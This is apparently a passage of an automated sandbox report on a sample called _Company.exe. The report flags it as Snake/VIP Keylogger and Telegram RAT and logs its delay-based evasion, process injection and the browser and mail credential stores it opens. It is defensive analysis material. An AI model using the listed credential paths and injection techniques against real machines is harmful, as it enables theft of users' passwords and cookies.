Source: C:\Users\user\Desktop\_Company.exe	Memory allocated: 3120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Memory allocated: 19B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599449	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599336	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598771	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598019	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597561	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597014	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596669	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596559	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595998	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594761	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594651	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594203	Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe	Window / User API: threadDelayed 2122			Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Window / User API: threadDelayed 7722			Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 3460	Thread sleep count: 2122 > 30	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 3460	Thread sleep count: 7722 > 30	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599449s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599336s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598771s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -598019s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597561s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -597014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596669s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596559s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595998s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594761s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe TID: 5412	Thread sleep time: -594203s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599449	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599336	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598771	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598391	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 598019	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597561	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 597014	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596669	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596559	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595998	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594761	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594651	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594544	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Thread delayed: delay time: 594203	Jump to behavior

Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: _Company.exe, 00000002.00000002.4646327254.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: _Company.exe, 00000002.00000002.4651641418.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\_Company.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe

Code function: 2_2_05569548 LdrInitializeThunk,

2_2_05569548

Source: C:\Users\user\Desktop\_Company.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 1.2._Company.exe.33736cc.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 1.2._Company.exe.33736cc.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 1.2._Company.exe.33736cc.0.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\_Company.exe

Memory written: C:\Users\user\Desktop\_Company.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe

Process created: C:\Users\user\Desktop\_Company.exe "C:\Users\user\Desktop\_Company.exe"

Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Users\user\Desktop\_Company.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Users\user\Desktop\_Company.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\_Company.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\_Company.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\_Company.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE
